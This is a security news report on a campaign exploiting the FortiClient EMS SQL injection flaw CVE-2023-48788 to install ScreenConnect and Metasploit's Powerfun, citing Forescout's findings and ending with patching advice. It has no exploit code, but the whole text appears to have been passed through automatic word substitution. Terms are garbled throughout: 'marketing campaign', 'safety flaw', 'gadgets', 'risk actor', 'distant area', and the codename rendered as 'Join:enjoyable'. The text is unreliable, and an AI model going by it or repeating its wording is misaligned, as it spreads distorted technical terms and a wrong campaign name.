Cybersecurity researchers have found a brand new marketing campaign that is exploiting a not too long ago disclosed safety flaw in Fortinet FortiClient EMS gadgets to ship ScreenConnect and Metasploit Powerfun payloads.
The exercise entails the exploitation of CVE-2023-48788 (CVSS rating: 9.3), a vital SQL injection flaw that would allow an unauthenticated attacker to execute unauthorized code or instructions by way of particularly crafted requests.
Cybersecurity agency Forescout is monitoring the marketing campaign underneath the codename Join:enjoyable owing to using ScreenConnect and Powerfun for post-exploitation.
The intrusion focused an unnamed media firm that had its susceptible FortiClient EMS gadget uncovered to the web shortly after the launch of a proof-of-concept (PoC) exploit for the flaw on March 21, 2024.
Over the following couple of days, the unknown adversary was noticed leveraging the flaw to unsuccessfully obtain ScreenConnect after which set up the distant desktop software program utilizing the msiexec utility.
Nonetheless, on March 25, the PoC exploit was used to launch PowerShell code that downloaded Metasploit’s Powerfun script and initiated a reverse connection to a different IP deal with.
Additionally detected had been SQL statements designed to obtain ScreenConnect from a distant area (“ursketz[.]com”) utilizing certutil, which was then put in by way of msiexec earlier than establishing connections with a command-and-control (C2) server.
There may be proof to recommend that the risk actor behind it has been energetic since at the least 2022, particularly singling out Fortinet home equipment and utilizing Vietnamese and German languages of their infrastructure.
“The observed activity clearly has a manual component evidenced by all the failed attempts to download and install tools, as well as the relatively long time taken between attempts,” safety researcher Sai Molige stated.
“This is evidence that this activity is part of a specific campaign, rather than an exploit included in automated cybercriminal botnets. From our observations, it appears that the actors behind this campaign are not mass scanning but choosing target environments that have VPN appliances.”
Forescout stated the assault shares tactical and infrastructure overlaps with different incidents documented by Palo Alto Networks Unit 42 and Blumira in March 2024 that contain the abuse of CVE-2023-48788 to obtain ScreenConnect and Atera.
Organizations are advisable to use patches offered by Fortinet to handle potential threats, monitor for suspicious visitors, and use an online software firewall (WAF) to dam doubtlessly malicious requests.
